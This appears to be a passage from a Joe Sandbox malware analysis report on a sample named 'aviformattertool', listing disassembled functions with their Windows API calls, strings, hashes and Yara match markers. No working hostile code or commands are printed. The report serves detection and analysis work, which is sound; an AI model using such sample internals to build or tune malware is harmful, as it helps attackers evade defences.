                                                                                                                                                          • Instruction Fuzzy Hash: DE2115B15483909FD710DF28C64475BBBE9BB88B08F504E5EF4A597280DBB9D808CF92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12350
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12360
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A12370
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A1237A
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                                          • String ID: pqcs
                                                                                                                                                          • API String ID: 1619523792-2559862021
                                                                                                                                                          • Opcode ID: 63a250d90dcb77d1017ce1f8df2c515da88dfa1f02bdd9147f821b48484f7a70
                                                                                                                                                          • Instruction ID: 1ced728481a3b64a412d823e9192d406e8373b2882b670b1d3f2e6c994adb3b7
                                                                                                                                                          • Opcode Fuzzy Hash: 63a250d90dcb77d1017ce1f8df2c515da88dfa1f02bdd9147f821b48484f7a70
                                                                                                                                                          • Instruction Fuzzy Hash: B1F054B1980318AFDB10AF749D49BABB7ADEF02711F00456AF905D3140FF70D9158B91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A14030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A14035
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 02A14042
                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A14049
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A14063
                                                                                                                                                            • Part of subcall function 02A1A64A: __EH_prolog.LIBCMT ref: 02A1A64F
                                                                                                                                                            • Part of subcall function 02A1A64A: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A1A65E
                                                                                                                                                            • Part of subcall function 02A1A64A: __CxxThrowException@8.LIBCMT ref: 02A1A67D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                          • API String ID: 3112922283-2104205924
                                                                                                                                                          • Opcode ID: e6e426f8e37fbdafebfde55af489480f9c7eea5b9217fab209e064611147ae1a
                                                                                                                                                          • Instruction ID: 4319dd3e4703a86768800e9bb22b677279d643a5691b0a1db616a888e59bf7de
                                                                                                                                                          • Opcode Fuzzy Hash: e6e426f8e37fbdafebfde55af489480f9c7eea5b9217fab209e064611147ae1a
                                                                                                                                                          • Instruction Fuzzy Hash: AAF08CB1E80209ABCB01EFE4CE18BEFB779EB08305F404599F914A2240DF388219CF91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00404842 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                                                                                                          • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                                                                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                                                                                                          • SetHandleCount.KERNEL32 ref: 004049DF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1710529072-0
                                                                                                                                                          • Opcode ID: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
                                                                                                                                                          • Instruction ID: 8fe4441db6cd525bc9d87713bb4edde2cd7c7f14dbffc3b3aa205102a4a4cd07
                                                                                                                                                          • Opcode Fuzzy Hash: 98b932809ab249fb6d2b1e7eb3a8536e99f5defad770c06167dc9539152dd1ea
                                                                                                                                                          • Instruction Fuzzy Hash: 2B5113F26003118BD7208B38CD48B673BA0BB91320F19473AE696FB2E1D73C8855C75A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A21C00 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A219D0: CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21A21
                                                                                                                                                            • Part of subcall function 02A219D0: WaitForSingleObject.KERNEL32(?,000000FF,56FF5638,?,?,?,?,56FF5638,02A219A3,56FF5638), ref: 02A21A38
                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A21C9E
                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02A21CBE
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02A21CF7
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02A21D4B
                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 02A21D52
                                                                                                                                                            • Part of subcall function 02A1418C: CloseHandle.KERNEL32(00000000,?,02A21C85), ref: 02A141B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4166353394-0
                                                                                                                                                          • Opcode ID: a3186b79ea989994da8ba323352541c38e25d3f7ddc66f94de57c6afdb8a1d7a
                                                                                                                                                          • Instruction ID: 8c30af104786712ff4972875206e1f7a3764815a6ad9c83e1392768fc58e3ecf
                                                                                                                                                          • Opcode Fuzzy Hash: a3186b79ea989994da8ba323352541c38e25d3f7ddc66f94de57c6afdb8a1d7a
                                                                                                                                                          • Instruction Fuzzy Hash: 8641EF71640321ABDB259F2DCCC0B17B7A4EF45728F140668EC1CDB2A6DB35D80A8B95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1207C Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A120AC
                                                                                                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A120CD
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A120D8
                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 02A1213E
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A121A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1611172436-0
                                                                                                                                                          • Opcode ID: 03af843160dbe6872b1bb850600786711e4c105e4d56e82ab5501cf20b528c56
                                                                                                                                                          • Instruction ID: cfbd9f5aec5b5b0eec9df9f213e2e366eb072cfcb4ce4fd28d307bbd3b95b3bd
                                                                                                                                                          • Opcode Fuzzy Hash: 03af843160dbe6872b1bb850600786711e4c105e4d56e82ab5501cf20b528c56
                                                                                                                                                          • Instruction Fuzzy Hash: BD317972544705AFC311CF25D884A6BBBF9FFC8764B140A1EF89A83650DB30E90ACB91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1E078 Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1E07D
                                                                                                                                                            • Part of subcall function 02A11A01: TlsGetValue.KERNEL32 ref: 02A11A0A
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A1E0FC
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A1E118
                                                                                                                                                          • InterlockedIncrement.KERNEL32(02A45170), ref: 02A1E13D
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A1E152
                                                                                                                                                            • Part of subcall function 02A127F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02A1284E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1578506061-0
                                                                                                                                                          • Opcode ID: f6dae50c304bddac7af4d2cce4234e81e1d46eb81a070e2c32762057373b4f18
                                                                                                                                                          • Instruction ID: 0e36866ba5c4c0f6ab2a8f395c88ae5f7b487b2cb3b683d1c14c382a97ba88b6
                                                                                                                                                          • Opcode Fuzzy Hash: f6dae50c304bddac7af4d2cce4234e81e1d46eb81a070e2c32762057373b4f18
                                                                                                                                                          • Instruction Fuzzy Hash: 243149B1D41304DFCB10DFA8CA44AAABBF8BF08320F14855EE849D7640EB34A605CFA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A30324 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _malloc.LIBCMT ref: 02A30330
                                                                                                                                                            • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
                                                                                                                                                            • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
                                                                                                                                                            • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
                                                                                                                                                          • _free.LIBCMT ref: 02A30343
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap_free_malloc
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1020059152-0
                                                                                                                                                          • Opcode ID: d7646571cf4a9df4f89990f5d27c3e30feab0fd6d99ff7e58e78301ea45a6491
                                                                                                                                                          • Instruction ID: 0fc2a8ce64cb2b10a4ef1d846348ee15a1d58b753c8fc1b1333d9b9307072d3d
                                                                                                                                                          • Opcode Fuzzy Hash: d7646571cf4a9df4f89990f5d27c3e30feab0fd6d99ff7e58e78301ea45a6491
                                                                                                                                                          • Instruction Fuzzy Hash: AA114832C89725EFDB262F78AD8875A3B9AEF01360F1449A5F909DA190DF34C855CE90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A121D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A121DA
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A121ED
                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02A12224
                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02A12237
                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02A12261
                                                                                                                                                            • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12350
                                                                                                                                                            • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12360
                                                                                                                                                            • Part of subcall function 02A12341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A12370
                                                                                                                                                            • Part of subcall function 02A12341: GetLastError.KERNEL32 ref: 02A1237A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1856819132-0
                                                                                                                                                          • Opcode ID: 278e9f26086e5f9b7aa3f920be5d53d44b8f1329aab6cb29e4871fcb35a66564
                                                                                                                                                          • Instruction ID: 1b7ee0e20ecd3bfe5fc086822d51f789b530355846cdf00b6be0aa8a878c16d6
                                                                                                                                                          • Opcode Fuzzy Hash: 278e9f26086e5f9b7aa3f920be5d53d44b8f1329aab6cb29e4871fcb35a66564
                                                                                                                                                          • Instruction Fuzzy Hash: BC119DB1D40129EBCB159FA8DD44AAEFBBAEF45320F00451AFC1192250DF71CA55DB80
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1229D
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A122B0
                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 02A122E7
                                                                                                                                                          • TlsSetValue.KERNEL32(?), ref: 02A12300
                                                                                                                                                          • TlsSetValue.KERNEL32(?,?,?), ref: 02A1231C
                                                                                                                                                            • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12350
                                                                                                                                                            • Part of subcall function 02A12341: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12360
                                                                                                                                                            • Part of subcall function 02A12341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02A12370
                                                                                                                                                            • Part of subcall function 02A12341: GetLastError.KERNEL32 ref: 02A1237A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1856819132-0
                                                                                                                                                          • Opcode ID: 9068d1bd5b0f584c0a39203d0b837b5205dd99f3b78261c4659a45e8a7bc0037
                                                                                                                                                          • Instruction ID: 965e7376652c4516a07b7f99bb211970f0e787e114e2a7378b65b86e62b06f6c
                                                                                                                                                          • Opcode Fuzzy Hash: 9068d1bd5b0f584c0a39203d0b837b5205dd99f3b78261c4659a45e8a7bc0037
                                                                                                                                                          • Instruction Fuzzy Hash: B4115EB5D41129AFCB019FA8DD44AAEFBBAEF88320F00445AF804A3210DF718955DF90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1BC92 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A1B0E5: __EH_prolog.LIBCMT ref: 02A1B0EA
                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 02A1BCAF
                                                                                                                                                            • Part of subcall function 02A244DA: RaiseException.KERNEL32(?,?,02A1FADF,?,?,?,?,?,?,?,02A1FADF,?,02A40F68,?), ref: 02A2452F
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02A41D84,?,00000001), ref: 02A1BCC5
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A1BCD8
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02A41D84,?,00000001), ref: 02A1BCE8
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A1BCF6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2725315915-0
                                                                                                                                                          • Opcode ID: 8a73f7f5eff4cfb25140884287407ab58089d58ed20f740fcadb9f68d9b7e388
                                                                                                                                                          • Instruction ID: 648e3c199574d8c2361da4b3477c54d978bfda217fbf11a02e0fa4facf351250
                                                                                                                                                          • Opcode Fuzzy Hash: 8a73f7f5eff4cfb25140884287407ab58089d58ed20f740fcadb9f68d9b7e388
                                                                                                                                                          • Instruction Fuzzy Hash: 0D0181B2A40305AFDB109BA4DDC9F8AB7ADFB08369B004914F625D6190DF70E815CB20
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A12432
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A12445
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A12454
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A12469
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A12470
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 747265849-0
                                                                                                                                                          • Opcode ID: 3f8ce8d7d2c679bd40f2f2b78b5e6c56cc05e2a54b2c08c513323de14b8160ce
                                                                                                                                                          • Instruction ID: 9fd1bc365eea7904328a78c46fd79ed3f038912a24429cced2c9b67fd854b819
                                                                                                                                                          • Opcode Fuzzy Hash: 3f8ce8d7d2c679bd40f2f2b78b5e6c56cc05e2a54b2c08c513323de14b8160ce
                                                                                                                                                          • Instruction Fuzzy Hash: 7BF030B2680214BBD7049BA0EE8AFD6B72DFB46711F804411F701D6480DF71E921CBA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02A11ED2
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02A11EEA
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A11EF9
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02A11F0E
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A11F15
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 830998967-0
                                                                                                                                                          • Opcode ID: 0c97f504b60c584d2c87c7fbaf43457f8232a5516b2a598a3e0502762e0e73c6
                                                                                                                                                          • Instruction ID: 9d9ed496faa33ddf3198b79aa554e2ef0177baa85e8c5dc2e910948abebbaa5d
                                                                                                                                                          • Opcode Fuzzy Hash: 0c97f504b60c584d2c87c7fbaf43457f8232a5516b2a598a3e0502762e0e73c6
                                                                                                                                                          • Instruction Fuzzy Hash: EEF01DB2541609BBD700AFA1ED88FD6B72DFF05351F000416F60186440DF71E626CBA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A20840 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A19A59: __EH_prolog.LIBCMT ref: 02A19A5E
                                                                                                                                                            • Part of subcall function 02A19A59: _Allocate.LIBCPMT ref: 02A19AB5
                                                                                                                                                            • Part of subcall function 02A19A59: _memmove.LIBCMT ref: 02A19B0C
                                                                                                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02A20922
                                                                                                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02A2092A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateErrorFormatH_prologLastMessage_memmove
                                                                                                                                                          • String ID: Unknown error$invalid string position
                                                                                                                                                          • API String ID: 1017912131-1837348584
                                                                                                                                                          • Opcode ID: c773ad565ae59182095142a2d7e09b13276888ee2d9c729148d784462f24aa1a
                                                                                                                                                          • Instruction ID: 1ab83336d2c710b1bd1dc561ffd58f7991d20a14e40f3736b2abcd12103837a9
                                                                                                                                                          • Opcode Fuzzy Hash: c773ad565ae59182095142a2d7e09b13276888ee2d9c729148d784462f24aa1a
                                                                                                                                                          • Instruction Fuzzy Hash: 9351BD706083419FEB14DF29C890B2FBBE4BBA8754F50092DF482A7691DB71E548CB92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A186CF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                          • API String ID: 4104443479-4289949731
                                                                                                                                                          • Opcode ID: 2b1faad9396fca001325e33335d911a2105634967858f42e202bb5ea1d226e5a
                                                                                                                                                          • Instruction ID: c8d146552695297c4797e9b04c6d9ac99a2c5dbf129c0ebd1cdb1da779a3adf0
                                                                                                                                                          • Opcode Fuzzy Hash: 2b1faad9396fca001325e33335d911a2105634967858f42e202bb5ea1d226e5a
                                                                                                                                                          • Instruction Fuzzy Hash: 7141A035300304EFEB24DF6DD984A5ABBAAEF41774B10092DE856CB681CF74E844CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A130AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A130C3
                                                                                                                                                          • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02A13102
                                                                                                                                                          • _memcmp.LIBCMT ref: 02A13141
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLastString_memcmp
                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                          • API String ID: 1618111833-2422070025
                                                                                                                                                          • Opcode ID: 259e3024bb84dbee00f50a9167d04d83f9b75289bf9fda709db2930819e59599
                                                                                                                                                          • Instruction ID: 40ace36490fc30c5c6937f99e968b4215f391853554aace2fd65bb056af69511
                                                                                                                                                          • Opcode Fuzzy Hash: 259e3024bb84dbee00f50a9167d04d83f9b75289bf9fda709db2930819e59599
                                                                                                                                                          • Instruction Fuzzy Hash: B831B371A003199FDF209F64C980B6EB7B6BF45334F1045AAE86597280DF719949CB90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1CD24 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1CD29
                                                                                                                                                            • Part of subcall function 02A1D2E7: std::exception::exception.LIBCMT ref: 02A1D314
                                                                                                                                                            • Part of subcall function 02A1DAFD: __EH_prolog.LIBCMT ref: 02A1DB02
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                            • Part of subcall function 02A1D344: __EH_prolog.LIBCMT ref: 02A1D349
                                                                                                                                                          Strings
                                                                                                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02A1CD5F
